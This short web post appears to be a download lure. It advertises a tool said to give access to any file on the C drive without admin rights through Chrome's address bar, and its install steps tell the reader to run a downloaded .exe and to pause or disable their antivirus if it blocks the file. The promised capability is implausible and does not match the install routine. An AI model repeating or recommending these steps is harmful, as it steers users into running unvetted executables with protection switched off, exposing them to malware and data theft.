you can access and download any file on the C drive without admin rights :)
All you have to do is type in the Address / Search bar in Chrome.

How to install:

1. Download, extract and run .exe file,

(If your antivirus blocking file, pause it or disable it for some time.)
2. Press Install button

3. Choose destination folder

4. Press Finish

How to Use:

Open destination folder and locate file notes.txt, open it and read step by step.
